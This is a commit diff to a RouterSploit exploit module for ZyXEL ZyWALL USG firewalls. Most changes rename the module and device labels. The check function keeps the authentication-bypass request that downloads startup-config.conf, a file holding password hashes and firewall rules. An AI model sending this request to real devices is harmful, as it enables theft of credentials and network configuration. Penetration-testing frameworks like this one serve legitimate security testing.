Changes in the code per PR comments.

6edc5c67 · dincaus · 29a50fa9 · 6edc5c67
Commit 6edc5c67 authored Mar 03, 2017 by dincaus
Show whitespace changes
Inline Side-by-side

Showing with 12 additions and 17 deletions

zywall_usg_extract_hashes.py ...ploit/modules/exploits/zyxel/zywall_usg_extract_hashes.py +12 -17

No files found.
--- a/routersploit/modules/exploits/zyxel/zywall_usg_extract_hashes.py
+++ b/routersploit/modules/exploits/zyxel/zywall_usg_extract_hashes.py
@@ -17,7 +17,7 @@ class Exploit(exploits.Exploit):
    If the tharget is vulnerable it allows to download configuration files which contains sensitive data like password hashes, firewall rules and other network related configurations.
    """
    __info__ = {
-        'name': 'ZyXEL ZyWALL USG',
+        'name': 'Zyxel ZyWALL USG Extract Hashes',
        'description': 'Exploit implementation for ZyWall USG 20 Authentication Bypass In Configuration Import/Export.'
                       'If the tharget is vulnerable it allows to download configuration files which contains sensitive data like password hashes, firewall rules and other network related configurations.',
        'authors': [
@@ -27,20 +27,21 @@ class Exploit(exploits.Exploit):
            'https://www.exploit-db.com/exploits/17244/',
        ],
        'devices': [
-            'ZyWALL USG-20',
-            'ZyWALL USG-20W',
-            'ZyWALL USG-50',
-            'ZyWALL USG-100',
-            'ZyWALL USG-200',
-            'ZyWALL USG-300',
-            'ZyWALL USG-1000',
-            'ZyWALL USG-1050'
-            'ZyWALL USG-2000'
+            'ZyXEL ZyWALL USG-20',
+            'ZyXEL ZyWALL USG-20W',
+            'ZyXEL ZyWALL USG-50',
+            'ZyXEL ZyWALL USG-100',
+            'ZyXEL ZyWALL USG-200',
+            'ZyXEL ZyWALL USG-300',
+            'ZyXEL ZyWALL USG-1000',
+            'ZyXEL ZyWALL USG-1050'
+            'ZyXEL ZyWALL USG-2000'
        ],
    }

    target = exploits.Option('', 'Target address e.g. https://192.168.1.1', validators=validators.url)  # target address
    port = exploits.Option(443, 'Target port')  # default port
+    script_content = None

    def run(self):

@@ -64,16 +65,10 @@ class Exploit(exploits.Exploit):

    @mute
    def check(self):  # todo: requires improvement
-
-        if 'https://' in self.target:
-            url = "{}/cgi-bin/export-cgi/images/?category={}&arg0={}".format(self.target, 'config', 'startup-config.conf')
-        else:
        url = "{}:{}/cgi-bin/export-cgi/images/?category={}&arg0={}".format(self.target, self.port, 'config', 'startup-config.conf')
-
        response = http_request(method="GET", url=url)

-        if response is not None:
-            if response.status_code == 200:
+        if response is not None and response.status_code == 200:
            self.script_content = response.text
            return True  # target is vulnerable